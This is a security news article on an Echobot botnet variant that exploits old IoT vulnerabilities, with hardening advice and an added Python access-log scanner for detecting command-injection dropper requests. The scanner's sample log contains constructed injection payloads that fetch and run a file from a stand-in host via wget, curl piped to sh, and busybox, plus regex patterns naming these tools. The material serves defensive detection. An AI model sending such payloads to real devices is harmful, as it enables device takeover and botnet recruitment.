Updated on August 27, 2019 at 8:52 PM PST to add solution rules.
Another Mirai offshoot spotted: A variant of the Echobot botnet was found using over 50 exploits that lead to remote code execution (RCE), arbitrary command execution, and command injection in internet of things (IoT) devices.
Security researcher Carlos Brendel Alcañiz first tweeted about the different exploits the variant uses to propagate. The payloads dropped by the malware show that the operator behind the variant relies on old and known exploits, some of them dating back to 2010. Moreover, the code used is available in multiple public exploit repositories.
The malware dropper was reportedly hosted on an open server, in a file called Richard. What’s particularly noteworthy about the variant is that the exploits it uses do not target a specific product line or device type. BleepingComputer lists the wide range of devices the variant can affect, which includes network attached storage (NAS) devices, routers, security cameras, and smart home hubs. The full list of exploits used by this particular Echobot variant is available here.
The number of payloads may be high, but this should not come as a surprise given that the Mirai malware’s source code was leaked in 2016. Malware authors have since come up with different variants and derivatives for campaigns that compromised many connected devices, usually through default or weak credentials.
Discovered by Palo Alto Networks researchers, Echobot was initially found using 18 exploits, followed by an Akamai report that described it incorporating 26 exploits. Trend Micro also reported on an Echobot variant that targets routers and other IoT devices with multiple exploits. This particular variant takes advantage of multiple publicly available proofs of concept (PoCs) and Metasploit modules.
Securing connected devices against Mirai and its offshoots
Malware authors have been putting their own spin on the infamous IoT malware since its discovery in 2016. Many botnets have since cropped up to attack devices, and this will likely continue. Based on related malicious activity in the past, attackers usually rely on unpatched devices and on devices that still use default settings and credentials. While device manufacturers play an important role in securing the devices, users and enterprises should also adopt best practices for added protection, such as:
Regularly updating devices and changing access credentials
Configuring the router’s settings to deter potential intrusions
Disabling outdated and unused device components
Enabling the auto-update feature if the device allows it
Encrypting the connections that the devices use
Incorporating security tools that provide additional protection to home networks and devices connected to them
Using only legitimate applications from trusted sources and stores
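The propagation method described above (an old command-injection or RCE exploit whose injected parameter downloads and runs a dropper such as the file called Richard) leaves a recognizable trace in a device's or gateway's web-server access log. The following is an added example, not code from the original article or from any of the cited researchers: a small Python log scanner that URL-decodes each request target (repeatedly, to expose double encoding), and flags query strings that combine a shell metacharacter with a download-and-execute token. The log lines, IP addresses and paths (for instance /cgi-bin/hypothetical.cgi) are constructed for this example; they are not signatures of the specific exploits the variant uses, and the heuristic is a generic one for this class of command injection.

```python
import re
from typing import Optional
from urllib.parse import unquote_plus

# Constructed sample access log in common log format. Addresses, paths and
# parameters are made up for this example; "Richard" is only the dropper file
# name mentioned in the article, these are not real Echobot requests.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Aug/2019:20:52:01 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.7 - - [27/Aug/2019:20:52:03 +0000] "GET /cgi-bin/hypothetical.cgi?cmd=cd+/tmp;wget+http://198.51.100.9/Richard;chmod+777+Richard;./Richard HTTP/1.1" 200 0
198.51.100.22 - - [27/Aug/2019:20:52:05 +0000] "POST /login HTTP/1.1" 401 0
198.51.100.22 - - [27/Aug/2019:20:52:09 +0000] "GET /api/hypothetical?opt=%60curl%20-s%20http%3A%2F%2F198.51.100.9%2Fx%20%7C%20sh%60 HTTP/1.1" 200 0
192.0.2.5 - - [27/Aug/2019:20:52:11 +0000] "GET /status?cmd=uptime HTTP/1.1" 200 128
192.0.2.9 - - [27/Aug/2019:20:52:15 +0000] "GET /setup?ntp=%2524%2528busybox%2bwget%2bhttp%253A%252F%252F198.51.100.9%252Fa%2529 HTTP/1.1" 200 0
"""

# Common log format: client, ident, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Shell metacharacters used to splice a second command into an injected parameter.
SHELL_META = re.compile(r'(;|\|\||\||&&|`|\$\()')
# Tokens typical of IoT "download and run" payload chains. The look-arounds keep
# "sh" from matching inside longer words while still matching "/bin/sh" and "| sh".
DROPPER_TOKENS = re.compile(r'(?<!\w)(wget|curl|tftp|ftpget|busybox|chmod|sh)(?!\w)')


def fully_decode(target: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded payloads (%2524 -> %24 -> $) are exposed.

    unquote_plus also turns '+' into spaces, which is how 'wget+http://...' in a
    query string is meant to be read by the device.
    """
    decoded = target
    for _ in range(max_rounds):
        nxt = unquote_plus(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded


def classify_request(target: str) -> Optional[dict]:
    """Return indicators if the query string looks like a command-injection dropper chain.

    Both a shell metacharacter and a downloader/exec token must be present, so a
    plain 'cmd=uptime' style parameter is not flagged on its own.
    """
    decoded = fully_decode(target)
    if "?" not in decoded:
        return None  # no parameters in the URL, nothing for this heuristic to inspect
    query = decoded.split("?", 1)[1]
    metachars = sorted(set(SHELL_META.findall(query)))
    tokens = sorted(set(DROPPER_TOKENS.findall(query)))
    if not (metachars and tokens):
        return None
    return {"decoded": decoded, "metachars": metachars, "tokens": tokens}


def scan_log(log_text: str) -> list:
    """Parse each access-log line and collect the requests that classify as suspicious."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or unrelated line, skip it
        verdict = classify_request(m["target"])
        if verdict:
            hits.append({"ip": m["ip"], "status": m["status"], **verdict})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']} status={hit['status']} meta={hit['metachars']} tokens={hit['tokens']}")
        print(f"    {hit['decoded']}")
```

Three of the six constructed lines are flagged: the plaintext wget/chmod chain, the backtick-wrapped curl piped to sh, and the double-encoded $(busybox wget ...) substitution. The 401 on /login and the benign cmd=uptime request are not, which is the point of requiring both a metacharacter and a dropper token. A 200 response on a flagged request is worth treating as a possible compromise rather than a blocked attempt, since the device may have executed the payload.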